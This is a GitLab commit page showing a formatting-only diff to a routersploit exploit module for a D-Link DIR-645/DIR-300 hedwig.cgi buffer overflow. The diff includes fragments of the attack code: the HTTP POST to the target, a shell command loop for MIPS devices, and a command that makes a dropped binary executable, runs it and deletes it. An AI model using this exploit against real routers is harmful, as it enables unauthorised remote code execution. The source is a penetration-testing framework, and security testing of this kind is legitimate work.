Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
46174915
Commit
46174915
authored
7 years ago
by
lucyoa
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Fixing pep
parent
723ee3e0
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
4 additions
and
5 deletions
+4
-5
multi_hedwig_cgi_exec.py
...t/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
+4
-5
No files found.
routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
View file @
46174915
...
...
@@ -22,13 +22,12 @@ class Exploit(exploits.Exploit):
'description'
:
'Module exploits an buffer overflow that leads to remote code execution'
,
'authors'
:
[
'Austin <github.com/realoriginal>'
],
# routersploit module
'references'
:
[
'references'
:
[
'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'
,
'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'
,
'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'
,
'https://www.exploit-db.com/exploits/27283/'
],
],
'devices'
:
[
'DIR-645 Ver 1.03'
,
'DIR-300 Ver 2.14'
,
...
...
@@ -44,7 +43,7 @@ class Exploit(exploits.Exploit):
print_success
(
"Target is vulnerable!"
)
print_status
(
"Invoking command loop..."
)
shell
(
self
,
architecture
=
"mipsle"
,
method
=
"echo"
,
location
=
"/tmp"
,
echo_options
=
{
"prefix"
:
"
\\\\
x"
},
exec_binary
=
"chmod 777 {0} && {0} && rm {0}"
)
echo_options
=
{
"prefix"
:
"
\\\\
x"
},
exec_binary
=
"chmod 777 {0} && {0} && rm {0}"
)
else
:
print_error
(
"Target is not vulnerable"
)
...
...
@@ -68,7 +67,7 @@ class Exploit(exploits.Exploit):
response
=
http_request
(
method
=
"POST"
,
url
=
url
,
headers
=
headers
,
data
=
data
,
cookies
=
cookies
)
if
response
is
None
:
return
""
return
response
.
text
[
response
.
text
.
find
(
"</hedwig>"
)
+
len
(
"</hedwig>"
):]
.
strip
()
return
response
.
text
[
response
.
text
.
find
(
"</hedwig>"
)
+
len
(
"</hedwig>"
):]
.
strip
()
@mute
def
check
(
self
):
...
...
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment